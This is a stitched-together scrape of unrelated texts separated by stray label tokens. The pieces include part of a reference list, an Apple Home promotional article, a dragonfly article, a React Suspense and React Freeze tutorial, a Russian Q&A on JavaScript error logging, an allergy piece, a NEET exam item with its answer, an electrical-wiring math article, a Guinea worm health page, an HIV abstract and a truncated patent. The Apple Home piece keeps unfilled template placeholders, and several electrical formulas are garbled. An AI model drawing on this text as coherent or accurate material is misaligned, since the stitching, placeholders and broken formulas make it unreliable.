MCD‟05), Houston, USA: IEEE Computer Society, 2005, p. 91–98 [3] C. Bhuvaneswari, P. Aruna, D. Loganathan“ Feature Selection Using Association Rules for CBIR and Computer Aided Medical Diagnostic”, International Journal of Computer & Communication Technology ISSN (PRINT): 0975 - 7449, Volume-4, Issue-1, 2013 [4] Uppaluri R, Hoffman EA, Sonka M, Hartley PG, Hunninghake GW, McLennan G.,”Computer recognition of regional lung disease patterns.” American Journal of Respiratory Critical Care Med ,1999;160:648–54. [5] Shyu CR, Brodley CE, Kak AC, Kosaka A, Aisen AM, Broderick LS. “ASSERT: a physician-in-the-loop content based retrieval system for HRCT image databases”. Computer Visual Image Understanding, 1999; 75: 111–32. [6] C. Brambilla and S. Spiro” HIGHLIGHTS IN LUNG CANCER” ,Copyright #ERS Journals Ltd 2001 ,European Respiratory Journal ,ISSN 0903-1936 [7] Armato SG, Giger ML, MacMohan H. “Automated detection of lung nodules in CT scans: preliminary results.” ,Med Phys 2001; 28: 1552–61. [8] Lee Y, Hara T, FujitaH, Itoh S, Ishigaki T,”.Automated detection of pulmonary nodules in helical CT images based on an improved template-matching technique”. IEEE Trans Med Imaging 2001;20:595–604. [9] McNitt-Gray MF, Har EM, Wyckoff N, Sayre JW, Goldin JG. “A pattern classification approach to characterizing solitary pulmonary nodules imaged on high resolution CT: preliminary results.“,Med Phys 1999 ; 26: 880–8. [10] Yankelevitz DF, Reeves AP, Kostis WJ, Zhao B, Henschke CI. “Small pulmonary nodules: volumetrically determined growth rates based upon CT evaluation”,. Radiology 2000; 217: 251 [11] Zagers H, VroomanHA,Aarts NJM, Stolk J,Kool LJS, Dijkman JH, et al. “Assessment of the progression of emphysema by quantitative analysis of spirometrically gated 8. 8. C. Bhuvaneswari, P. Aruna, D. Loganathan / International Journal of Engineering Research and Applications (IJERA) ISSN: 2248-9622 www.ijera.com Vol. 3, Issue 4, Jul-Aug 2013, pp.2517-2524 2524 | P a g e computed tomography images”,. Invest Radiol 1996; 31: 761–7. [12] Adelson, E. H. and Bergen, J. R. “Spationtemporal energy models for the perception of motion.”, Journal of the optical society of america A, 2:284–299. [13] Rajdev Tiwari and Manu Pratap Singh, “Correlation-based Attribute Selection using GeneticAlgorithm, “,International Journal of Computer Applications (0975 – 8887), Volume 4– No.8, August 2010:28-34 [14]. I. H. Witten, E. Frank..” Data Mining: Practical machine learning tools and techniques.”,2nd Edition, Morgan Kaufman, San Francisco, 2005. [15] H.D.Tagare, C. Jafe, J. Duncan, “Medical image databases: A content-based retrieval approach”, Journal of the American Medical Informatics Asssociation,4 (3),1997, pp. 184-198. [16] Nassir Salman” Image Segmentation Based on Watershed and Edge Detection Techniques”The International Arab Journal of Information Technology, Vol. 3, No. 2, April 2006, pp.104-110 [17] A. Jain and D. Zongker, “Feature Selection: Evaluation,Application, and Small Sample Performance”, IEEE Transactions on Pattern Analysis and Machine Intelligence, 1997, Vol. 19, No. 2, pp. 153-158. ×
__label__pos
0.871599
Apple Home: Transforming Our Living Spaces 29 oktober 2023 Jon Larsson An Overview of Apple Home In recent years, smart homes have gained immense popularity, offering convenience, comfort, and increased energy efficiency. Among the giants in the industry, Apple Home has emerged as a leading player in offering seamless integration and control over various smart devices in our homes. This article delves into the comprehensive world of Apple Home, providing a detailed exploration of its features, popular products, and the key differentiating factors that set it apart from other smart home systems. Understanding Apple Home: What It Is and Its Types apple products Apple Home, also known as HomeKit, is Apple’s platform for smart homes that allows users to control and manage numerous devices using their iOS devices such as iPhones, iPads, or even Siri voice commands. With Apple Home, users can create a connected ecosystem encompassing various aspects of their homes, including lighting, security systems, thermostats, door locks, cameras, and more. There are two primary types of Apple Home devices: certified accessories and bridges. Certified accessories, such as smart plugs, light bulbs, and door locks, have built-in HomeKit technology, ensuring easy integration and control through the Apple Home app. Bridges, on the other hand, serve as a gateway between non-HomeKit devices and the Apple Home ecosystem, enabling users to connect and manage devices that would otherwise be incompatible. The popularity of Apple Home has grown significantly over the years, with a wide range of devices certified by Apple. From trusted brands like Philips, Lutron, and Logitech, there is an extensive selection of compatible Apple Home accessories available to suit every individual’s needs and preferences. Quantifying the Apple Home Experience When it comes to quantifying the Apple Home experience, a few key metrics help showcase its effectiveness. One such metric is the number of compatible devices. As of (current year), Apple Home offers compatibility with over (number of devices) smart devices, allowing users to manage their entire smart home ecosystem from a single app. Another quantitative measurement is the level of integration and convenience offered. Through Apple’s Home app, users can create scenes, which are preconfigured settings that activate multiple devices simultaneously. For instance, a ”Good Morning” scene could turn on the lights, adjust the thermostat, and play your favorite morning playlist, all with a single tap or voice command. Additionally, Apple Home provides robust privacy and security features that ensure users’ data and connected devices remain protected, making it a trusted choice for homes worldwide. Differentiating Apple Home from Its Competitors What sets Apple Home apart from its competitors is its emphasis on privacy and data security. With Apple’s strong commitment to user privacy, HomeKit uses end-to-end encryption ensuring that sensitive user data is securely transmitted and stored. This level of security sets Apple Home ahead of other smart home systems and provides peace of mind for users concerned about their privacy. Furthermore, Apple’s strict certification process ensures that only reliable and trusted manufacturers produce HomeKit compatible devices. This results in a more reliable and seamless experience as compared to other ecosystems where device compatibility and interoperability can be a challenge. A Historical Perspective: Advantages and Disadvantages of Apple Home Looking back, the evolution of Apple Home has brought forth both advantages and disadvantages. Initially, the limited range of compatible devices and high price point posed significant barriers to entry. However, as the ecosystem expanded and more manufacturers embraced HomeKit, the range of options and affordability increased, making it more accessible to a wider audience. The advantages of Apple Home lie in its seamless integration with other Apple devices and services. Whether it’s using Siri voice commands or automating tasks through Apple’s Home app, the user experience is unparalleled in terms of convenience and ease of use. Additionally, its focus on privacy and security adds another layer of trust, especially for users concerned about data breaches or unauthorized access to their smart home. One apparent disadvantage is that Apple Home is limited to Apple users only, which may restrict its potential user base. Additionally, although the ecosystem has expanded significantly, certain niche devices or specialized home automation systems may still lack compatibility with HomeKit. In conclusion, Apple Home has transformed the way we interact with our living spaces. Its seamless integration, emphasis on privacy and security, and increased compatibility options have made it a frontrunner in the smart home industry. As Apple continues to invest in innovation and partner with leading manufacturers, the future of Apple Home looks promising for its devoted users and beyond. Word Count: 786 FAQ How does Apple Home prioritize privacy and security? Apple Home prioritizes privacy and security by using end-to-end encryption for data transmission and storage. Apples strict certification process ensures that only reliable and trusted manufacturers produce HomeKit compatible devices. This provides users with a safe and secure smart home experience. What is Apple Home? Apple Home, also known as HomeKit, is Apples platform for smart homes that allows users to control and manage numerous devices using their iOS devices such as iPhones, iPads, or even Siri voice commands. It offers seamless integration and control over various smart devices in our homes. What types of devices are compatible with Apple Home? Apple Home is compatible with a wide range of certified accessories such as smart plugs, light bulbs, door locks, and bridges that serve as gateways for non-HomeKit devices. This allows users to control and manage lighting, security systems, thermostats, door locks, cameras, and more. Fler nyheter
__label__pos
0.573535
Why Dragonflies Are The World's Deadliest Hunters When it comes to deadly predators, sharks, tigers, and crocodiles might be the first animals to come to mind, but as fearsome as these beasts are, they don't compare to the much smaller, deadlier dragonfly. These insects may look delicate, with their translucent wings and slender bodies, but they are some of the strongest insects in the world, according to Britannica. While dragonflies often eat small insects, they sometimes feast on prey that weighs almost half of their body weight, and in order to be able to do that, they must have some magnificent super powers. As it turns out, dragonflies posses an amazing skill set. For starters, they have enormous eyes that allow them to see their surroundings with an almost 360-degrees view, per Britannica. This ability helps them to hunt, of course, but the eyes are only a part of why dragonflies have earned the title of being the most deadly predator around. Dragonflies have a remarkable success rate One of the things that makes dragonflies so deadly is their success rate. According to experts at Sandia National Laboratories, they are one of the most adept hunters, catching a whopping 95% of the critters they go after when looking for a meal. Dragonflies operate with such precision, they are being used as models for improving missile defense systems. But what is it that makes these tiny creatures so successful? Researchers at the Howard Hughes Medical Institute discovered that one of the insect's abilities involves an acute sense of awareness. During an attack, they know where their prey is in relation to their own bodies, and they move based on how they expect their prey to move, instead of simply reacting to their target's movement. Researchers explained that this kind of maneuver is similar to how a person might react as they try to catch a football. But that's not all. Dragonflies also know how to position themselves below a target to avoid being noticed, all while keeping their eyes fixed on their prey. Dragonflies are lightning fast Dragonflies are the fastest flying insects, and they can reach up to 35 miles per hour, according to Smithsonian. This speed no doubt helps these insects get around, but they also have fast reflexes that improve their success rate when it comes to hunting down their prey. Once a dragonfly decides to attack, it only takes around half of a second to do so, and it can attack while in flight. Researchers at Sandia National Laboratories break it down like this: A dragonfly's reaction time for pouncing on its prey is 50 milliseconds. To put this into perspective, it takes about 300 milliseconds for humans to blink an eye. And speaking of those 360-degree eyes, dragonflies must move their heads remarkably fast to keep their eyes on their target as they proceed to attack them. The insect is aware of any subtle movements their prey makes, and can respond to them immediately, which makes them the kings of fast food.
__label__pos
0.949554
Andrew Evans Husband, engineer, FOSS contributor, and manager at CapTech. Follow me at rhythmandbinary.com and andrewevans.dev. Exploring React Suspense with React Freeze 4 min read 1178 React Suspense React Freeze If you follow React, you’ve undoubtedly heard of React Suspense, a component that allows you to gracefully handle loading and rendering data in your React projects. At the time of writing, React Suspense is still in the experimental stage. To further develop the ideas behind React Suspense, the React Freeze project essentially enables you to freeze component rendering and control what is actually updated in your React apps. This approach works well with React Native projects, as well as regular React web applications. In this article, we’ll walk through React Freeze, learning how to use it in our apps. First, I’ll introduce React Suspense, then show how it works in a demo project. Next, I’ll show how React Freeze can enhance what you see with React Suspense. If you’d like to follow along, I have sample React Suspense and React Freeze implementations at my react-suspense-and-freeze GitHub repo. Let’s get started! What is React Suspense? React Suspense is an experimental concept that is available in React 18. To install React Suspense, I recommend installing React 18 and reviewing the information in this Github thread. Essentially, React Suspense allows you to gracefully handle loading data by suspending rendering until all the parts of your components are ready to display. A common problem developers face in frontend development is that you may need to wait for an API call, or you may want to control what is shown to the user so they don’t see incomplete data. React Suspense provides a suspense component, which includes a fallback that is shown while the component loads. Check out the example below, which was originally copied from the CodePen project: function ProfilePage() { return ( <Suspense fallback={<h1>Loading profile...</h1>} > <ProfileDetails /> <Suspense fallback={<h1>Loading posts...</h1>} > <ProfileTimeline /> </Suspense> </Suspense> ); } As you can see in the code above, there is a <ProfileDetails /> component as well as <ProfileTimeline /> component. The fallback is a basic <h1> element that just has the words Loading profile… and Loading posts…. With this functionality, you don’t have to add any conditional statements or use useEffect in your code to verify if something is loaded. The example below, originally copied from the React QuickStart example, includes a suspender implementation that mimics an API call. There are a lot of mechanisms that we use to handle such activity, like try...catch blocks, as well as libraries like Axios. You can see it in the wrapPromise function in the fakeApi.js file below: We made a custom demo for . No really. Click here to check it out. function wrapPromise(promise) { let status = "pending"; let result; let suspender = promise.then( (r) => { status = "success"; result = r; }, (e) => { status = "error"; result = e; } ); return { read() { if (status === "pending") { throw suspender; } else if (status === "error") { throw result; } else if (status === "success") { return result; } } }; } Wrapping the <Suspense> element handles the result of this call with the fallback elements. These concepts could be super useful to developers, and I’m excited to see them in a future release of React. If you’d like to learn more about where this feature is in development, check out the React Docs. What is React Freeze? React Freeze builds on the ideas presented in React Suspense, enabling you to pause component rendering for a good user experience. The approach is similar to React Suspense as you can see in the following example, which was copied from the React Freeze GitHub Repo: function SomeComponent({ shouldSuspendRendering }) { return ( <Freeze freeze={shouldSuspendRendering}> <MyOtherComponent /> </Freeze> ); } In the example above, you wrap your component with a <Freeze> element. You then pass a boolean flag to the Freeze element to determine if the child component is rendered or not. Doing so is advantageous within web applications because you can control your application’s rendering, potentially even preventing incomplete data from rendering unnecessarily. If you’re following along in my sample project, look in the react-freeze-sample-project folder and you’ll see the following code: profileResponse === null ? <h1>Loading profile...</h1> : <> <button onClick={() => callService()}>refresh</button> <Freeze freeze={profileResponse === null}> <ProfileDetails user={profileResponse} /> { postsResponse === null ? <h1>Loading posts...</h1> : <Freeze freeze={postsResponse === null}> <ProfileTimeline posts={postsResponse} /> </Freeze> } </Freeze> </> ); Similar to what we did with Suspense, we wrap our components with a <Freeze> element, then determine when to show them. My sample project is very simple, but you can imagine how useful this could be in a larger application. Like having a Suspender mechanism, if you look at the React Freeze source code, you see how the render is actually handled: function Suspender({ freeze, children, }: { freeze: boolean; children: React.ReactNode; }) { const promiseCache = useRef<StorageRef>({}).current; if (freeze && !promiseCache.promise) { promiseCache.promise = new Promise((resolve) => { promiseCache.resolve = resolve; }); throw promiseCache.promise; } else if (freeze) { throw promiseCache.promise; } else if (promiseCache.promise) { promiseCache.resolve!(); promiseCache.promise = undefined; } return <Fragment>{children}</Fragment>; } React Native and React Freeze You can also enable this behavior in React Native applications by importing the Freeze element: import { enableFreeze } from "react-native-screens"; enableFreeze(true); React Native applications handle screens with a navigation stack, meaning that as a user progresses, the previous screen’s state is held on a stack for future use. If you implement React Freeze with React Native, you can control what is rendered on the different screens. My sample project just has Suspense and Freeze implementations in a web application; if you’d like to see an example of React Freeze with React Native, check out the sample project by Natanaelvich at react-freeze-example. Visualizing Freeze and Suspense When I was writing this post, I found Chrome DevTools very helpful with visualizing the rendering. If you open Chrome DevTools and select rendering, you can select paint flashing, which will paint sections of your page to be rendered like in the following image: Chrome DevTools Paint Flashing I also recommend installing the React developer tools extension on Chrome. If you do this, you can open it in Chrome DevTools and view what is rendered: React Dev Tools Extension Wrapping Up In this post, we covered both React Freeze and React Suspense. React Suspense is a powerful concept that I hope will be available in future React releases. React Freeze provides a solid implementation of similar concepts that can be used in both web and React Native applications. There is still some work to be done to standardize this behavior, but the strategy of controlling what is rendered provides both a solid user experience and performant implementation for React projects. I also recommend checking out my sample project, and playing with Chrome DevTools to see this in action. Thanks for reading my post! Follow me on andrewevans.dev and connect with me on Twitter at @AndrewEvans0102. Full visibility into production React apps Debugging React applications can be difficult, especially when users experience issues that are hard to reproduce. If you’re interested in monitoring and tracking Redux state, automatically surfacing JavaScript errors, and tracking slow network requests and component load time, try LogRocket. LogRocket is like a DVR for web and mobile apps, recording literally everything that happens on your React app. Instead of guessing why problems happen, you can aggregate and report on what state your application was in when an issue occurred. LogRocket also monitors your app's performance, reporting with metrics like client CPU load, client memory usage, and more. The LogRocket Redux middleware package adds an extra layer of visibility into your user sessions. LogRocket logs all actions and state from your Redux stores. Modernize how you debug your React apps — . Andrew Evans Husband, engineer, FOSS contributor, and manager at CapTech. Follow me at rhythmandbinary.com and andrewevans.dev. Leave a Reply
__label__pos
0.920645
Как я могу регистрировать ошибки Javascript и сообщать об этом без использования Javascript? В моем webapp в настоящее время используется система регистрации ошибок на основе JS для сообщения JS-ошибки на стороне клиента. Проблема с записью вашей ошибки с помощью javascript заключается в том, что мы используем технологию для мониторинга проблем в той же технологии. Легкая ошибка в JS может помешать записи журнала. Мне было интересно, есть ли у кого-нибудь идея, как мы могли бы регистрировать и сообщать об ошибках на стороне клиента, не полагаясь на собственный код Javascript. спасибо 3 ответа Неа. Но вы можете использовать блок try/catch, чтобы избавиться от ошибки javascript, которая в противном случае остановила выполнение. try { stuff.that('raises').error(); } catch(e) { // send e via ajax } мы используем технологию мониторинга проблем в этой же технологии Разве мы не всегда это делаем. Вы когда-нибудь делали обработку ошибок и исключений на языке, отличном от того, с которым работаете? Используйте window.onerror обратный вызов. Также будут улавливать синтаксические ошибки. Или попробуйте поймать ошибку, как предлагает @Squeegy. К сожалению, я не считаю, что это возможно. Вам нужно будет использовать javascript в той или иной форме, чтобы улавливать и сообщать об ошибках, отправлять ли его запрос ajax или отправлять пользователям форму с ошибками в текстовом поле. licensed under cc by-sa 3.0 with attribution.
__label__pos
0.904896
 Guinea Worm Disease Symptoms, Causes, Treatment - What are the signs and symptoms of Guinea worm disease? - MedicineNet Guinea Worm Disease (cont.) What are the signs and symptoms of Guinea worm disease? Infected persons do not usually have symptoms until about one year after they become infected. A few days to hours before the worm emerges, the person may develop a fever, swelling, and pain in the area. More than 90% of the worms appear on the legs and feet, but may occur anywhere on the body. People, in remote, rural communities who are most commonly affected by Guinea worm disease (GWD) frequently do not have access to medical care. Emergence of the adult female worm can be very painful, slow, and disabling. Frequently, the skin lesions caused by the worm develop secondary bacterial infections, which exacerbate the pain, and extend the period of incapacitation to weeks or months. Sometimes permanent disability results if joints are infected and become locked. What is the treatment for Guinea worm disease? There is no drug to treat Guinea worm disease (GWD) and no vaccine to prevent infection. Once the worm emerges from the wound, it can only be pulled out a few centimeters each day and wrapped around a piece of gauze or small stick. Sometimes the worm can be pulled out completely within a few days, but this process usually takes weeks or months. Analgesics, such as aspirin or ibuprofen, can help reduce swelling; antibiotic ointment can help prevent bacterial infections. The worm can also be surgically removed by a trained doctor in a medical facility before an ulcer forms. Patient Comments Viewers share their comments Guinea Worm Disease - Signs and Symptoms Question: Describe the signs and symptoms of Guinea worm disease experienced by you or someone you know. Guinea Worm Disease - Location Question: Please discuss your travels and where you might have contracted Guinea worm disease. STAY INFORMED Get the Latest health and medical information delivered direct to your inbox!
__label__pos
0.94795
NEET Sample Paper NEET Sample Test Paper-21 • question_answer During the injury nasal septum gets damaged and for the recovery which cartilage is responsible? A)  Elastic cartilage B)  Fibrous cartilage C)  Hyaline cartilage D)  Calcified cartilage Correct Answer: C You need to login to perform this action. You will be redirected in 3 sec spinner
__label__pos
0.998998
Electrical wiring involves several mathematical concepts and calculations to ensure safe and efficient operation. Let’s explore some of the key mathematical aspects of electrical wiring: 1. Ohm’s Law Ohm’s Law is a fundamental principle in electrical engineering and plays a crucial role in understanding electrical circuits. It relates the voltage (V), current (I), and resistance (R) in a circuit through the formula: 𝑉=𝐼×𝑅 This formula states that the voltage across a circuit (V) is equal to the product of the current flowing through the circuit (I) and the resistance of the circuit (R). This law is essential for calculating various parameters in electrical circuits, such as determining the voltage drop across resistors or calculating the current flowing through a circuit. 2. Power Calculations The power (P) consumed by an electrical device or circuit is another important aspect that requires mathematical calculations. Power is measured in watts (W) and can be calculated using the formulas: 𝑃=𝑉×𝐼 𝑃=𝐼2×𝑅 𝑃=𝑉2𝑅 These formulas allow us to calculate power based on voltage (V), current (I), and resistance (R) values in a circuit. Understanding power calculations is crucial for designing electrical systems, determining appropriate wire sizes, and ensuring that electrical components can handle the power load without overheating. 3. Voltage Drop Calculations Voltage drop is a phenomenon where the voltage decreases as current flows through a conductor due to its inherent resistance. Excessive voltage drop can lead to inefficient operation and potential equipment damage. The voltage drop (VD) in a circuit can be calculated using Ohm’s Law: 𝑉𝐷=𝐼×𝑅 Where VD is the voltage drop, I is the current, and R is the resistance of the conductor. Voltage drop calculations are essential for sizing conductors correctly, especially in long-distance electrical wiring installations. 4. Electrical Load Calculations Determining the electrical load of a circuit or system is crucial for designing and sizing electrical components appropriately. The electrical load is the amount of power consumed by devices or equipment connected to the circuit. Load calculations involve factors such as voltage, current, power ratings of devices, and duty cycles. Various formulas and standards are used for load calculations in different applications, such as residential, commercial, or industrial settings. These calculations help ensure that electrical systems can handle the expected load without exceeding capacity or causing safety hazards. 5. Wire Size and Ampacity Choosing the correct wire size is critical for safe and efficient electrical wiring. Wire size is determined based on the expected current carrying capacity or ampacity of the wire. Ampacity calculations consider factors such as wire material, insulation type, ambient temperature, and allowable temperature rise. The National Electrical Code (NEC) provides guidelines and ampacity tables for selecting appropriate wire sizes based on the current load and application requirements. Ampacity calculations help prevent overheating and ensure electrical safety in wiring installations. In conclusion, electrical wiring involves various mathematical calculations, including Ohm’s Law, power calculations, voltage drop calculations, electrical load calculations, wire size, and ampacity calculations. Understanding these mathematical concepts is essential for designing, installing, and maintaining safe and efficient electrical systems. For expert electrical services and consultation in Clifton Park, NY, trust Eric Gandler Development Electric. Contact us today for all your electrical needs. http://www.ericgandlercliftonparkny.com/ #ElectricalWiring #OhmsLaw #PowerCalculations #VoltageDrop #ElectricalLoad #WireSize #Ampacity #EricGandler #CliftonParkNY #ElectricalMath
__label__pos
0.999979
Site-specific footprinting reveals differences in the translocation status of HIV-1 reverse transcriptase. Implications for polymerase translocation and drug resistance. Abstract: Resistance to nucleoside analogue inhibitors of the reverse transcriptase of the HIV-1 often involves phosphorolytic excision of the incorporated chain terminator. Previous crystallographic and modeling studies suggested that this reaction could only occur when the enzyme resides in a pre-translocational stage. Here we studied mechanisms of polymerase translocation using novel site-specific footprinting techniques. Classical footprinting approaches, based on the detection of protected nucleic acid residues, are not sensitive enough to visualize subtle structural differences at single nucleotide resolution. Thus, we developed chemical footprinting techniques that give rise to hyperreactive cleavage on the template strand mediated through specific contacts with the enzyme. Two specific cuts served as markers that defined the position of the polymerase and RNase H domain, respectively. We show that the presence of the next correct dNTP, following the incorporated chain terminator, caused a shift in the position of the two cuts a single nucleotide further downstream. The footprints point to monotonic sliding motions and provide compelling evidence for the existence of an equilibrium between pre- and post-translocational stages. Our data show that enzyme translocation is reversible and uncoupled from nucleotide incorporation and the release of pyrophosphate. This translocational equilibrium ensures access to the pre-translocational stage after incorporation of the chain terminator. The efficiency of excision correlates with an increase in the population of complexes that exist in the pre-translocational stage, and we show that the latter configuration is preferred with an enzyme that contains mutations associated with resistance to nucleoside analogue inhibitors. Polymerases: Topics: Health/Disease Status: new topics/pols set partial results complete validated Results: No results available for this paper. Entry validated by: Log in to edit reference All References Using Polbase tables: Sorting: Tables may be sorted by clicking on any of the column titles. A second click reverses the sort order. <Ctrl> + click on the column titles to sort by more than one column (e.g. family then name). Filtering: It is also possible to filter the table by typing into the search box above the table. This will instantly hide lines from the table that do not contain your search text.
__label__pos
0.959063
What is an Allergy? Allergies Are a Lot More Than a Runny Nose and Itchy Eyes!   What is an Allergy?   An allergy is an inappropriate immune response to an exposure that causes illness when a person inhales, ingests or comes in contact with a substance their body believes is a threat. When asked, many people describe an allergy as a runny nose, sinus congestion, hives or the anaphylactic response of restricted airways. Most people have not recognized allergies as the cause of illness, autism, pain, ADD, ADHD, chronic fatigue and auto immune diseases. Often allergies are misunderstood as psychosomatic disorders, and the suffering person is made to feel like he or she is imagining the symptoms. Allergies are simply caused by the central nervous system perceiving a substance as a threat, thereby causing the body to react in a negative way to that item.  If the central nervous system does not recognize a substance as a threat, that person will not react sensitively to it. The following are nine categories of allergen’s as discussed in Dr. Devi S. Nambudripad’s book, “Say Goodbye to What is and allergyIllness” 1. Inhalents:  Contacted thru the nose, throat or bronchial tubes…such as perfumes, exhaust, chemicals, pollens, smoke, cooking smells, plants herbs, etc. 2. Ingestants:  Items brought to the mouth such as food and beverages. 3. Contactants:  Anything that we touch or touches the skin 4. Injectants:  Vaccinations, drugs, bites, stings 5. Infectants:  Bacterias, viruses, parasites 6. Physical Agents:  Heat, cold, wind, humidity, radiation, pressure, motion, sound, colors… 7. Genetic Factors:  Allergens and tendencies towards allergies that are passed down generationally 8. Molds and Fungi:  Can be inhaled, contacted, injected, or ingested 9. Emotional Stressors Untreated immune responses from allergies can cause numerous health problems! More causes of allergies>>>  
__label__pos
0.915686
Calories burned per squat How many squats burn 100 calories? If you’re going at a rate of 40 squats a minute — a pretty fast speed — you could do 100 squats in two and a half minutes and burn close to 15 calories . How many calories do you burn doing 15 squats? So, this formula shows that a person who weighs 165 pounds and performs 5 minutes of high-intensity squats has burned 52.5 calories . Range of calories burned for a person who weighs 140 pounds (63.5 kilograms) low intensity (3.5 METS) high intensity (8.0 METS) 15 minutes 58 calories 133 calories Is Squat good for losing weight? For weight loss and fitness, experts say squats are one of the best exercises you should do regularly. It helps engage all core muscle groups, increases stability and strength. Does squatting burn more calories than sitting? Although it isn’t as intense as a normal squat , the resting squat burns more calories than simply sitting on a chair. That means a resting squat may be classified as a low-activity workout, which is beyond the resting baseline but less than a 150-minute moderate-intensity physical activity per week. What will 100 squats a day do? Doing squats helped me gain muscle Even after running my ass off on a treadmill, my legs have never been properly toned. Doing 100 squats daily has helped in muscling up my thighs and calves. Although they aren’t as ripped, they are fairly toned and thankfully, there are no cellulite pockets anymore. Is 50 squats a day good? This means not only are they great in toning and strengthening your butt and thighs, they’re an excellent workout for your core muscles at the same time. Other benefits may include greater strength and tone in your back and calf muscles, plus improved ankle mobility and stability. You might be interested:  Chicken drumstick calories How can I burn 1000 calories a day? Be well hydrated and have a small breakfast. Walk on a treadmill at an incline for an hour. I am 6′ and 200 lbs, and when I walk at 4 mph and a 6% incline, I burn about 1,000 calories an hour. So one way to reach your goal is to do this for 5 hours (adjusting for your calorie burn based on your own research). Does squats reduce belly fat? You cannot spot reduce fat from anywhere on the body; it’s impossible. With that said, squats are such a good exercise for burning body fat and building lean muscle that if you’re doing them regularly, you’re highly likely to start dropping body fat all over, including the belly and thighs. What will 200 squats a day do? Strengthen and sculpt your quads, glutes, hamstrings and calves by training to do 200 consecutive squats . Can you lose weight doing 100 squats a day? Squats for Weight Loss If you ‘re doing 100 squats a day , or even doing them several times per week, you ‘ll notice results in as little as eight weeks of training. This will outweigh the benefits of squats alone for fat loss and overall physical health. Is it OK to do squats daily? “ Daily squats will help you mentally and will even give you better yearly check-ups with your primary physician.” The most obvious benefit of squats is building your leg muscles – quadriceps, hamstrings, and calves. Squats , and all of their variations, are a great exercise for the whole body. Will squats make your butt bigger? “What daily or weekly squats will do is strengthen those big muscles in your lower body—primarily the quadriceps, hamstrings, glutes, and hips.” And it’s important to train the other muscles if you ultimately want a rounder, bigger booty . You might be interested:  Sugar donuts calories How can I burn 500 calories a day? Burn 500 Calories Working Out At-Home (30-Min Workouts) Running. High-intensity interval training (HIIT) Cycling. Plyometrics. Climbing stairs. Dancing. Housework. Bodyweight workouts. Are squats bad for knees? Squats aren’t bad for your knees . In fact, when done properly, they are really beneficial for knee health. If you’re new to squatting or have previously had an injury, it’s always a good idea to have an expert check your technique. To find a university-qualified exercise professional near you, click here. Do squats make your thighs bigger? Squats increase the size of your leg muscles (especially quads, hamstrings and glutes) and don’t do much to decrease the fat, so overall your legs will look bigger . If you ‘re trying to decrease the muscles in your legs , you need to stop squatting . Leave a Reply Your email address will not be published. Required fields are marked *
__label__pos
0.992316
Search Images Maps Play YouTube News Gmail Drive More » Sign in Screen reader users: click this link for accessible mode. Accessible mode has the same essential features but works better with your reader. Patents 1. Advanced Patent Search Publication numberUS6179158 B1 Publication typeGrant Application numberUS 09/355,184 PCT numberPCT/JP1998/005346 Publication dateJan 30, 2001 Filing dateNov 27, 1998 Priority dateNov 28, 1997 Fee statusLapsed Also published asCA2279295A1, CN1087703C, CN1248212A, EP0978456A1, WO1999028196A1 Publication number09355184, 355184, PCT/1998/5346, PCT/JP/1998/005346, PCT/JP/1998/05346, PCT/JP/98/005346, PCT/JP/98/05346, PCT/JP1998/005346, PCT/JP1998/05346, PCT/JP1998005346, PCT/JP199805346, PCT/JP98/005346, PCT/JP98/05346, PCT/JP98005346, PCT/JP9805346, US 6179158 B1, US 6179158B1, US-B1-6179158, US6179158 B1, US6179158B1 InventorsHideaki Koda Original AssigneeA. K. Technical Laboratory, Inc. Export CitationBiBTeX, EndNote, RefMan External Links: USPTO, USPTO Assignment, Espacenet Injection stretch blow molded wide mouthed container for a paint container and the like US 6179158 B1 Abstract A wide mouthed container of synthetic resins for a paint, wax and the like, formed thinly in the body portion thereof by injection stretch blow molding is provided. A mouth portion of the wide mouthed container is of large diameter and comprises an internal wall integral with a body portion having a bottom, a belt shaped external wall integrally formed on the outside of the internal wall via a joint portion of required width to be in H-shape, and an upper and lower annular grooves between both the walls sectioned by the joint portion. The body portion is stretch blow molded thinly from the underside of the internal wall to a position where the lower edge of the external wall touches the body portion to form the side surface of the body portion on the same level as said external wall and to form the lower annular groove into a hollow in the lower part of the mouth portion. A plurality of ribs for preventing the deformation of the joint portion in stretching the body portion are integrally formed aslope onto a corner between the under surface of said joint portion at its external wall side and the inner surface of the external wall to provide a required number of the ribs in the lower annular groove at a regular interval. Images(7) Previous page Next page Claims(8) What is claimed is: 1. An injection stretch blow molded wide mouthed container for a paint container and the like wherein a mouth portion of large diameter thereof comprises an internal wall integral with a body portion having a bottom, a belt shaped external wall integrally formed on the outside of the internal wall via a joint portion of required width to be in H-shape, and an upper and lower annular grooves between both the walls sectioned by said joint portion, and said body portion is stretch blow molded thinly from the underside of the internal wall to a position where the lower edge of the external wall touches the body portion to form the side surface of the body portion on the same level as said external wall and to form the lower annular groove into a hollow in the lower part of the mouth portion, said wide mouthed container comprising a rib for preventing the deformation of the joint portion in stretching the body portion, integrally formed aslope onto a corner between the under surface of said joint portion at its external wall side and the inner surface of the external wall, a required number of the ribs provided in the lower annular groove at a regular interval. 2. An injection stretch blow molded wide mouthed container for a paint container and the like according to claim 1, wherein said container is molded in such a manner that an injection molded preform comprising a mouth portion of large diameter composed of an internal wall integral with a body portion having a bottom, an external wall of belt shape integrally formed on the outside of the internal wall via a joint portion of required width to be in H-shape, and an upper and lower annular grooves between both the walls sectioned by said joint portion, is held at said mouth portion provided by cooling and solidifying, and said body portion is stretch blown to the same level as said external wall while a portion from the underside of said internal wall to the body portion is in high temperatures. 3. An injection stretch blow molded wide mouthed container for a paint container and the like according to claim 2, wherein said preform comprises the body portion extending from said internal wall, the body portion is composed of a thick-walled planiform stretch expanded portion of corn shape and a recess of required inner diameter formed at the center of said preform by outwardly projecting a top portion of the stretch expanded portion; the bottom surface of the recess is formed to be nearly flat and thin; and the stretch expanded portion on the periphery of the recess is formed to curve inwardly. 4. An injection stretch blow molded wide mouthed container for a paint container and the like according to claim 1, wherein mounting holes are formed at symmetrical positions on the external wall in the molding of said preform; and fitting tabs projectingly provided on the inner sides of both end portions of a flexible corded handle are rotatably fitted and locked into the mounting holes respectively to mount said handle across both sides of an opening portion. 5. An injection stretch blow molded wide mouthed container for a paint container and the like according to claim 4, wherein said fitting tab is of tablet shape and comprises a semicircular locking block on the upside of the tip thereof; the end portions of the handle and the fitting tabs comprise a slit extending from the lower end to the central portion thereof; and the slits allow the end portions of the handle and the fitting tabs to be reduced in size to insert the fitting tabs along with the locking blocks into said mounting holes rotatably, so that said locking blocks are hooked and set inside the external wall. 6. An injection stretch blow molded wide mouthed container for a paint container and the like according to claim 1, said container further comprises a lid, wherein a projection for latching is projectingly provided on a rim of the lid, and is inserted into a fitting hole provided in a side surface of the external wall to close the 